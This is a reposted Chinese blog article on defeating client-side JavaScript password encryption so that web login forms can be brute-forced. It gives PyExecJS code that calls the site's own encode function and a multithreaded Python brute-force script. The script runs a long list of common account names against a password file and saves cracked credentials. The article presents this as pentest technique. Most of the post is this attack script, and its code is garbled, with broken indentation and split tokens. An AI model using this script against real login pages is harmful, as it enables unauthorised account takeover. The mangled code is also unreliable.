前端黑客之绕过前端加密进行爆破

最新推荐文章于 2024-08-19 10:39:01 发布
最新推荐文章于 2024-08-19 10:39:01 发布
阅读量355 收藏 1
点赞数
文章标签: 前端 ViewUI
原文链接:https://juejin.im/post/5ad6b7fc6fb9a028dd4ec1aa
版权

在渗透的过程中,有时候会遇到密码在前端加密了,为我们爆破提高了难度。加密是js脚本 自定义函数加密,burp里面的一些加密函数就满足不了我们的需求。如下所示,密码为 admin123,加密的效果如下:

可以看到加密的函数主要是encode,所以每个密码都由自定 义 函 数 加 密 。

最 近 在 实 战 过 程 中 get 到 一 个 new trick , 利 用 相 应 的 工 具 或 者 模 块 执 行 该 js 文 件 , 拿 到 输 出 结 果 即 可 , 可 以 使 用 python 自 带的 execjs 。

安 装

先 安 装 execjs

pip install PyExecJS

将 js 代 码 保 存 在 本 地 。

#coding:utf- 8

from selenium import webdriver

import execjs

with open ( 'test.js' , 'r' ) as jj:

    source = jj. read () 

    phantom = execjs.get( 'PhantomJS' ) 

    getpass = phantom. compile ( source ) 

    mypass = getpass. call ( 'encrypt' , 'admin' , 'admin123' )

    print mypass 
复制代码

利 用以 上 代 码 可 获 得 相 应 的 密码 。

爆 破

自 动 化 走 起 , 写 了 一 个 python 脚 本 进 行 渗 透 爆 破 。

#coding=utf-8

import sys

reload(sys)

sys.setdefaultencoding( "utf-8" )

import requests

import re

import base64

import time

import random

import threading from selenium

import webdriver

import execjs

def brute (user,password,UA) :

            url = 'http://xxx/login' 

            with open( 'test.js' , 'r' ) as jj: 

            source = jj.read() 

            # phantom = execjs.get('PhantomJS') 

             phantom = execjs.get() 

            getpass = phantom.compile(source) 

            print user, password 

            mypass = getpass.call( 'encode' , user, password) 

            passwd = mypass 

            print passwd

    post_data = {} 

    post_data[ 'userName' ] = user 

    post_data[ 'userPass' ] = passwd

    post_data[ 'verifyCode' ] = 'dsvx' 

    headers ={ "Content-Type" : "application/x-www-form-urlencoded; charset=U TF-8" ,                             "Referer" : "http://xxx/" , "Connection" : "close" } 

    resp = requests.post(url=url,data=post_data,headers=headers) print user+ "#"                                     +password+ " " +resp.content

                if not resp.content.find( u' 请 检 查 账 号和 密 码 ' ) > 0 : 

                          print '*** find user:' , user, 'with password:' , password, '***' 

                          with open( 'accounts-cracked.txt' , 'a+' ) as f: 

                          f.write(user + '    ' +  passwd + '\n' ) 

       def main () : 

                tsk = [] 

                user_list = [ 'admin' , 'noreply' , 'hr' , 'jobs' , 'qiniu' , 'lietou' , 'dem o' , 'ceo' , 'dev' , 'root' , 'service' , 'fuwu' , 'yunying' , 'webmaster' , 'wechat' , 'weixin' , 'weibo' , 'tec' , 'bd' , 'bf' , 'op' , 'shop' , 'test' , 'pm' , 'kefu' , 'cd n' , 'marketing' , 'zhaopin' , 'suggestion' , 'warning' , 'risk' , 'system' , 'pay' , 'payment' , 'management' , 'feedback' , 'guanli' , 'ci' , 'ad' , 'td' , 'news' , 'ce rt' , 'sdk' , 'pmd' , 'appstore' , 'development' , 'it' , 'fankui' , 'notify' , 'bug s' , 'security' , 'sec' , 'alipay' , 'yunwei' , 'message' , 'support' , 'ceshi' , 'de veloper' , 'notice' , 'redmine' , 'alert' , 'kaifa' , 'seo' , 'git' , 'vpn' , 'jenkin s' , 'jira' , 'zabbix' , 'chandao' , 'nagios' , 'monitor' , 'account' , 'jubao' , 'ba ckup' , 'open' , 'openapi' , 'github' , 'reload' , 'blacklist' , 'buyer' , 'caiwu' , 'order' , 'postmaster' , 'pr' , 'report' , 'public' , 'download' , 'som' , 'ops' , 'd evops' , 'caigou' , 'pmp' , 'monit' ] 

            f1 = open( 'pass2.txt' , 'r' ) 

            for i in f1.readlines(): 

            password = i.strip()

                    for j in user_list: 

                            user = j 

                            UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:5 6.0)                                                     Gecko/20100101 Firefox/56.0" 

                            t = threading.Thread(target = brute,args = (user,passwor d,UA))                                     tsk.append(t) 

                                    for t in tsk: 

                                            t.start() 

                                            t.join() # 阻 塞 (0.1) 

                if __name__ == '__main__':

                            main() 
复制代码

开了一个新群,期待感兴趣的小伙伴加入进来,一起学习交流解决问题,吹水广告勿扰

感兴趣的小伙伴也可以在评论去留言

转载于:https://juejin.im/post/5ad6b7fc6fb9a028dd4ec1aa

weixin_34248849
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
登录口JS前端加密绕过-jsEncrypter工具
热门推荐
wo41ge的博客
02-24 1万+
概述 渗透测试过程中遇到web登录的时候,现在很多场景账号密码都是经过js加密之后再请求发送(通过抓包可以看到加密信息) burp抓到的包,request的post的登录包,password参数的值是经过前端加密之后再进行传输的,遇到这种情况,普通发包的爆破脚本就很难爆破成功。鉴于这种情况,这边分析四种方式进行绕过加密爆破 这里主要讲一种 大佬的工具jsEncrypter jsEncrypter工具 https://github.com/c0ny1/jsEncrypter 安装流程 安装maven 具
如何有效绕过网页登录_浅谈XSS攻击的那些事(附常用绕过姿势)
weixin_39870700的博客
11-29 9263
本文由geek痕‭原创投稿一叶知安,已向作者发放一定奖励。投稿参见:一叶知安征稿前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层...
关于前端加密登陆绕过的渗透思路
Adminxe的博客
08-22 1991
0x00 前端加密 好就不发博客了,今天主要讲一下前端加密绕过前端加密,判断加密类型,根据加密类型,找到对应解密形式,同时如果存在简单前端校验时,比如js绕过,base64编码,这样的话就会简单很多,但对于AES加密时,我们就首先要熟悉AES的加密规则。 0x01 关于AES加密规则 https://www.cnblogs.com/starwolf/p/3365834.html 附上链接,AES五种加密模式(CBC、ECB、CTR、OCF、CFB)。 c++源码: /** *@param..
绕过前端加密进行爆破
weixin_34101229的博客
07-14 521
1.概述 现在很多web 在登陆的过程中会用 js 对账号密码进行加密之后再进行传输,我们利用代理工具抓到的包看到账号密码是密文而非明文,这样对批量爆破或者撞库进行传参就会产生障碍,所以这片文章对遇到这类问题如何解决思路的一个分析。 2.思路 一般有两种思路,其一对 js 进行分析,拆解js 的加密算法,利用自己熟悉的语言进行重写,这里...
前端加密爆破之Burp插件详解(jsEncrypter、BurpCrypto)
内心不种满鲜花就会长满杂草
12-08 1万+
1. 加载jsEncrypter.0.3.2.jar插件 下载地址:jsEncrypter · GitHub(下载zip文件) 将jar文件加载进burp 安装完后会多一个jsEncrypter 2. 靶场安装 下载地址:https://github.com/c0ny1/jsEncrypter 将其中的 jsEncrypter-master\test\webapp文件夹复制出来放在网站根目录中,让后访问 抓取密码关键字password进行搜索,...
《密码爆破漏洞详解》——黑客必修的入门操作( 建议收藏 )
2401_84573531的博客
04-26 1047
密码爆破又叫暴力猜解, 简单来说就是将密码逐个尝试, 直到找出真正的密码为止, 本质上是利用了穷举法穷举法专业点讲是叫枚举法, 枚举法的中心思想是逐个考察某类事件的所有可能情况, 从而得出一般结论, 那么这个结论就是可靠的通常情况下, 我们根据已知的部分条件确定答案的大致范围, 并在此范围内对所有可能的情况逐一验证, 直到全部情况验证完毕, 由于枚举法所需的计算成本太高, 因此我们可以利用计算机运算速度快精度高的特点,来执行枚举过程,理论上来讲, 使用枚举法可以暴力破解任意一个用户密码。
网络渗透----验证码绕过、密码找回漏洞
EdisonJH的博客
03-13 1761
验证码绕过、密码找回漏洞 —笔记和实战 一、验证码作用 验证码(CAPTCHA)是:全自动区分计算机和人类的图灵测试的缩写、是一种区分用户是计算机还是人的全自动程序。 验证码可以防止:恶意破解密码、刷票、邮箱防止黑客对一个特定的程序暴力破解方式进行不断的尝试登录、实际上验证码是很多网站通行的方式、我们利用比较简易的方式实现了这个功能。 验证码五花八门:纯文本、点击字符、邮箱注册、滑块验证码 。 二...
SQL注入各种注入原理|绕过技巧|带实例详解|
没有
03-19 8275
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9437
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
对md5加密绕过
qq_43457125的博客
08-27 1083
if(md5(key1)==md5(key1) == md5(key1)==md5(key2) && $key1 !== $key2){ echo $flag.”取得flag”; 如果md5加密的值一样而未加密的值不同,就输出flag. 有两种方法绕过: 1,md5()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 ht...
渗透测试中前端加密如何爆破(详细版)
kATERAS的博客
08-06 2684
前端加密如何爆破
记一次实战前端登录爆破绕过技巧-网络安全(黑客)自学
MachineGunJoe666
03-15 1928
1.刚才的实战其实也是有运气的成分,因为yzm识别插件并不是百分百成功识别,当我们遇到正确的密码但是验证码却识别失败的话就很蛋疼,所以我们可以编写脚本,在系统提示验证码失败的时候我们可以把这个密码在丢回去继续爆破,这样就能达到百分百跑完我们的字典,师傅们可以研究下,这个基本是这种爆破用的基本模板吧,可以自己根据实际情况更改,这里就不多说了,。@#这类的,但是他的登录口是做了前端编码,验证码也是需要识别的,一般很多不会前端编码破解和验证码识别的师傅都会跳过了直接,这里给大家演示下如何使用上面装的插件工具。
干货!| 针对前端加密爆破的方法及实战案例
最新发布
zkaqlaoniao的博客
08-19 890
现在基本上大部分web应用系统都在后台登录界面对密码使用了js加密,有的是将用户名密码同时进行加密,对于使用了加密的我们可以利用burp插件直接调用加密函数本地加密后再进行爆破,也可以使用一些工具直接模拟浏览器登录界面进行爆破
WEB安全新玩法 [2] 防范前端验证绕过
天存信息
09-18 2575
防范前端验证绕过一、前端验证的原始网站1.1 正常用户访问1.2 攻击者访问二、iFlow虚拟补丁后的网站2.1 正常用户访问2.2 攻击者访问2.3 代码三、总结 用户登录,几乎是所有 Web 应用所必须的环节。Web 应用通常会加入一些验证手段,以防止攻击者使用机器人自动登录,如要求用户输入图形验证码、拖动滑动条等。但是,如果验证的逻辑仅仅在前端执行,是很容易被攻击者绕过的。iFlow 业务安全加固平台 可以为只使用前端验证的应用打上动态虚拟补丁,使之成为需要前后端配合执行的验证逻辑,大幅度提高攻击者的
几种前端加密解密的方法
Webghost511的博客
03-09 3653
以 Vue 作为例子 1.CryptoJS加密解密 首先引用CryptoJS的库 https://cdn.staticfile.org/crypto-js/3.1.9/crypto-js.min.js 加密: const key = CryptoJS.enc.Utf8.parse("1234123412ABCDEF"); //十六位十六进制数作为密钥 const iv = CryptoJS.en...
网络攻防新手入门之绕过前端限制
qq_45962898的博客
11-23 1873
用Burp Suite绕过前端限制前提准备工具正式步骤结语 前提 在网络攻防CTF实战过程中,常常会遇到各种前端设置的限制,将新手白帽er拦在门外,这是学习的第一节:绕过前端的限制 准备工具 一共要用的工具来进行此次任务: Burp Suite ,本次渗透的辅助工具; 火狐浏览器 ,本次渗透的网页支持; 练习靶场; 正式步骤 1.靶场的初始化 2.自己输入修改一次后 经过本次修改后,我们发现个人信息中的邮箱部分有条件限制,必须设置成XXX@XXX的格式,我们此次的任务就是要绕过这个限制 3.开始修改
对密文密码进行爆破的一种方法
x1t02m的博客
08-22 6231
需求 在爆破某款路由器管理员登录密码时,从burp抓到的包可以看到password参数的值是经过前端加密之后再进行传输的,这种情况下使用明文密码字典几乎不可能爆破成功。我的尝试是本地调用该登录界面用来加密的js函数,将明文密码字典转为对应的密文密码字典。 实践过程 首先我们查看一下点击登录按钮后都执行了那些js函数。 (command+f)搜索check()函数定义的位置,可以看到...
PC微信逆向分析の绕过加密访问SQLite数据库
翻肚鱼儿的博客
11-03 1957
PC微信逆向分析の绕过加密访问SQLite数据库 作者:zmrbak(赵庆明老师) 前言:微信,无疑是国内目前最为流行的应用软件,其在社交领域的霸主地位依然无人可以撼动!它不但撑起了庞大的腾讯软件帝国的一角,而且足以让腾讯傲立于BAT中国互联网三巨头之首。微信,改变了这个世界,而腾讯也成了无数优秀程序员梦想的归宿。围绕着微信这个软件的延伸,腾讯也无私地为代码世界贡献了近百个优秀的开源项目。从古到今,任何一个巨人,都是站在前一辈巨人的肩膀上而成长为新的巨人。百度如此,阿里如此,腾讯亦是如此。SQLite
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值